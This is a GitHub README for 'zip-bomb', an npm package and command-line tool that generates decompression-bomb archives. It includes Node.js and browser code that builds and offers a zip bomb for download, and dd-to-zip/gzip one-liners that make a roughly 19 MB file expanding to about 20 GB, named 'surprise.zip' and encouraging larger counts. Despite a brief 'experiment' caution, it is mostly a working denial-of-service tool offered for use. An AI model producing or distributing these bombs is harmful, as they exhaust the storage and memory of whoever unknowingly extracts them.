Skip to content

harshjv/zip-bomb

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
bin
bin
 
 
example
example
 
 
.gitignore
.gitignore
 
 
.travis.yml
.travis.yml
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
_config.yml
_config.yml
 
 
index.js
index.js
 
 
package.json
package.json
 
 

Repository files navigation

💣 Zip bomb standard travis npm

CAUTION THIS IS JUST AN EXPERIMENT. USE THIS AT YOUR OWN RISK. READ MORE ABOUT ZIP BOMB HERE.

Zip bomb for Browser and Node.js.

⚡️ Live demo here

Installation

npm install zip-bomb

Checkout API usage.

Command line

npm install -g zip-bomb

Usage

Usage: zip-bomb [options]

Options:

  -h, --help                       output usage information
  -V, --version                    output the version number
  -b, --zero-buffer-size <number>  Zero buffer size
  -l, --buffer-level <number>      Buffer multiplier
  -z, --zip-level <number>         Level
  -o, --output <file>              Output file

Example:

    zip-bomb -b 10485760 -l 10 -z 50 -o surprise.zip

API

zipBomb.createBuffer(zeroBufferSize, bufferLevel, zipLevel)

Creates ZIP file Buffer.

returns Promise

Parameters

  • zeroBufferSize
    • can be Number
    • creates buffer of 0s with provided size
  • bufferLevel
    • can be Number
    • multiplies created buffer with zeros with provided buffer level
  • zipLevel
    • creates zip zeroBufferSize * bufferLevel zeros of provided zip level

zipBomb.createDataURL(zeroBufferSize, bufferLevel, zipLevel)

Creates DataURL (for use in browsers)

returns Promise

Parameters

Same as zipBomb.createDataURL(bufferMultiplier, level)

Usage

In Node.js

const fs = require('fs')
const zb = require('zip-bomb')

const fileName = 'zipbomb.zip'

zb.createBuffer(1024 * 1024 * 10, 10, 10)
  .then((buffer) => {
    fs.writeFile(fileName, buffer, (err) => {
      if (err) throw err

      console.log(`${fileName} is created`)
    })
  })

WARNING zipbomb.zip file is evil!

In Browser (with Browserify or webpack)

const zb = require('zip-bomb')

zb.createDataURL(1024 * 1024 * 10, 10, 10)
  .then((dataURL) => {
    const a = document.createElement('a')
    const linkText = document.createTextNode('Click here to download zip bomb')

    a.appendChild(linkText)
    a.href = dataURL
    document.body.appendChild(a)
  })
  .catch((e) => console.error(e))

Embed bundled file into an HTML page and click on the link to download generated zip bomb!

Or open /example/index.html folder in browser.

Debug

In Node.js

Enable debug logs by setting the DEBUG environment variable.

DEBUG=zip-bomb*

In Browser

Enable debug logs by running this in the developer console.

localStorage.debug = 'zip-bomb*'

and then reload.

The Linux Way

dd if=/dev/zero bs=1000 count=20000000 | zip surprise.zip -

or

dd if=/dev/zero bs=1000 count=20000000 | gzip > surprise.gz

Creates around 19 MB file that extracts to around 20 GB file. Keep increasing the count and enjoy!

Test

npm test

standard only for now. More to come.

License

MIT

About

💣 Zip bomb for Browser and Node.js.

www.npmjs.com/package/zip-bomb

Topics

npm npm-package zip-bomb

Resources

Readme

License

MIT license
Activity

Stars

15 stars

Watchers

2 watching

Forks

5 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages